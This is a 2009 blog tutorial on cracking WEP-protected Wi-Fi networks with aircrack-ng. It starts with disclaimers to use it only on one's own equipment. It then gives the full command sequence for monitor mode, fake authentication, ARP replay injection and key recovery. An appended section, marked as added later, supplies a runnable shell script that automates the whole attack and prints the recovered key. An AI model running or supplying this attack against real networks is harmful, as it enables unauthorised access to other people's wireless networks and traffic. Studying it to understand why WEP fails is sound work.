Posts Tagged ‘cracking’

WEP network cracking using Realtek ALFA based WIFI cards

Tuesday, November 17th, 2009

There are many guides teaching people how to do this, so you are probably wondering why I wrote my own. Simply put, most of them are wrong or outdated and no longer work. This one works on Arch Linux using the aircrack-ng suite.

First off - WEP is broken and should not be used to protect anything. Use WPA2 (or WPA if your hardware cannot do better).
Secondly - using other people's networks, whether encrypted or not, is illegal. So don't do it.
Thirdly - this is purely for educational purposes, and should only be done against your own equipment.

The easiest way to try this out is to get a spare router, or to turn a Nokia Nseries wifi capable phone into an access point using JoikuSpot. Find the MAC address (BSSID) of the hotspot, its name (ESSID) and its channel; airodump-ng, used below, shows all three. I will use channel 11 from now on, but you will have to use whatever channel your AP is on. Incidentally, a great tool for doing this from a Nokia N-series is Barbelo (unsupported, but still works great).

You will need the aircrack-ng suite. Once armed with this, the rest is easy. First, stop NetworkManager, otherwise it will keep fighting you for control of the card and pull it out of monitor mode:

(for arch/*bsd) - /etc/rc.d/networkmanager stop
(for ubuntu/fedora/opensuse) - /etc/init.d/<service> stop, where the service is network-manager on Ubuntu and NetworkManager on Fedora; check the exact name in /etc/init.d/

- Put the desired Wifi card into monitor mode
(this may give you a separate monitor interface, in my case mon0)

sudo airmon-ng start wlan1

- Use Airodump to monitor the networks (leave this running in the background)

sudo airodump-ng --ivs --channel 11 --bssid MACOFAP --write filename mon0

(11 is the channel number, --bssid restricts the capture to your own AP, --ivs stores only the IVs rather than whole packets, and --write filename produces files named filename-01.ivs and so on)

- Use aireplay-ng to fake an authentication with the AP (the AP has to accept our MAC before it will take injected frames)

sudo aireplay-ng -1 0 -e 'NetworkName' -a MACOFAP -h MACOFWIFICARD mon0

- Once the fake authentication has succeeded, it's injection time

sudo aireplay-ng -3 -e 'NetworkName' -a MACOFAP -h MACOFWIFICARD mon0

(there are other types of attack that are a lot faster than this; read the aireplay-ng documentation if you want. Since this is for educational purposes I see no need to go into more detail: the AP will be right next to you, so there is no need for more sophisticated attacks. One caveat: -3 is the ARP request replay attack, so it has to see at least one ARP request on the network before it can start replaying anything. If the #data counter does not move, generate some traffic, e.g. connect a phone or laptop to the AP and let it pick up an address via DHCP.)

The trick is to get enough IVs. airodump-ng shows a #data column for every AP around. Watch your AP: the #data should go flying up after a while running aireplay-ng -3. Once you get to ~10,000 for a 64-bit key or ~100,000 for a 128-bit key (the PTW attack that current aircrack-ng uses by default usually needs far fewer, but these are safe targets), leave everything running, just in case, and try cracking as such:

aircrack-ng -b MACOFAP filename-01.ivs

The filename will be whatever you called it when running airodump-ng, with -01 appended (the counter goes up every time you restart airodump-ng with the same name). Because of --ivs the extension is .ivs; without --ivs you would get a much bigger .cap file, which aircrack-ng reads just as well. If there is more than one file, look at the biggest one.

If you get something then you are king. Just use the following, or start NetworkManager again and enter the key without the colons, and you are good to go. Now shove your AP back to WPA2 and if your neighbour is using WEP offer to change it for them ;-) You can call it your good deed for the day.

Connecting to the network using the cli as root (if you used the same card for the attack, take it out of monitor mode first with airmon-ng stop mon0):

ifconfig wlan0 up
iwconfig wlan0 essid "NetworkName" key THISISTHEKEY   # the hex key with the colons removed; for an ASCII passphrase use key s:passphrase
dhcpcd wlan0
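Putting the steps together, here is the whole procedure as one script. This is an added example, not code from the original post or from the aircrack-ng project: the wlan1/mon0 interface names, the wepcap prefix and the 00:11:22:33:44:55 BSSID are placeholders, and the IV threshold is the 10,000 figure from above. The helper functions read the IV count for your AP out of airodump-ng's CSV file and turn aircrack-ng's KEY FOUND! line into the colon-free hex key that iwconfig wants; the attack itself only runs when the script is invoked with "run".

```shell
#!/bin/sh
# Added example (not code from the original post): the post's airmon-ng /
# airodump-ng / aireplay-ng / aircrack-ng steps wrapped in one script, plus
# small text helpers that read airodump-ng's CSV and aircrack-ng's output.
# Interface, prefix and MAC values below are placeholders; change them to
# match your own card and your own AP. Run as root against your own AP only.

IFACE="wlan1"               # card that supports monitor mode and injection
MON="mon0"                  # monitor interface airmon-ng creates (check its output)
CHANNEL="11"
ESSID="NetworkName"
AP_MAC="00:11:22:33:44:55"  # placeholder BSSID of your own AP
PREFIX="wepcap"             # airodump-ng --write prefix -> wepcap-01.ivs, wepcap-01.csv

# Normalise a MAC to lowercase and check the xx:xx:xx:xx:xx:xx form.
# Prints the normalised MAC and returns 0, or prints nothing and returns 1.
valid_mac() {
    mac=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    if printf '%s' "$mac" | grep -Eq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'; then
        printf '%s\n' "$mac"
        return 0
    fi
    return 1
}

# Read the "# IV" column for one BSSID from airodump-ng's <prefix>-01.csv.
# Columns: BSSID, First time seen, Last time seen, channel, Speed, Privacy,
# Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key.
ivs_for_bssid() {
    awk -F', *' -v b="$(printf '%s' "$2" | tr 'a-f' 'A-F')" \
        'toupper($1) == b { print $11; exit }' "$1"
}

# Pull the key out of aircrack-ng's "KEY FOUND! [ xx:xx:... ]" line on stdin
# and print it without colons, which is what iwconfig (and NetworkManager) want.
wep_key_from_aircrack() {
    sed -n 's/.*KEY FOUND! \[ *\([0-9A-Fa-f:]*\) *].*/\1/p' | head -n 1 \
        | tr -d ':' | tr 'a-f' 'A-F'
}

# 10 hex digits = 40-bit secret ("64-bit WEP"), 26 = 104-bit ("128-bit WEP").
wep_key_bits() {
    case "${#1}" in
        10) echo 64 ;;
        26) echo 128 ;;
        *)  echo 0; return 1 ;;
    esac
}

# The procedure itself. Nothing here runs unless the script is invoked with "run".
run_attack() {
    ap=$(valid_mac "$AP_MAC") || { echo "bad AP MAC: $AP_MAC" >&2; return 1; }
    card=$(valid_mac "$(cat "/sys/class/net/$IFACE/address")") || return 1

    airmon-ng start "$IFACE" "$CHANNEL"
    airodump-ng --ivs --channel "$CHANNEL" --bssid "$ap" --write "$PREFIX" "$MON" &
    dump=$!
    sleep 5
    # Fake authentication (-1 0 = no re-association delay), then ARP replay (-3).
    aireplay-ng -1 0 -e "$ESSID" -a "$ap" -h "$card" "$MON"
    aireplay-ng -3 -e "$ESSID" -a "$ap" -h "$card" "$MON" &
    replay=$!

    # Wait for the post's conservative 64-bit target, then let aircrack-ng have a go;
    # it retries on its own as the .ivs file grows, so this loop is only a backstop.
    key=""
    while [ -z "$key" ]; do
        sleep 30
        n=$(ivs_for_bssid "$PREFIX-01.csv" "$ap")
        echo "IVs so far: ${n:-0}"
        [ "${n:-0}" -ge 10000 ] || continue
        key=$(aircrack-ng -b "$ap" "$PREFIX-01.ivs" | wep_key_from_aircrack)
    done
    kill "$replay" "$dump" 2>/dev/null
    echo "WEP key ($(wep_key_bits "$key")-bit, colons removed): $key"
}

if [ "${1:-}" = "run" ]; then
    run_attack
fi
```

Invoke it as root with `sh wep.sh run`; without the argument it only defines the functions, so you can source it in a shell and use the helpers on saved airodump-ng and aircrack-ng output without touching the card.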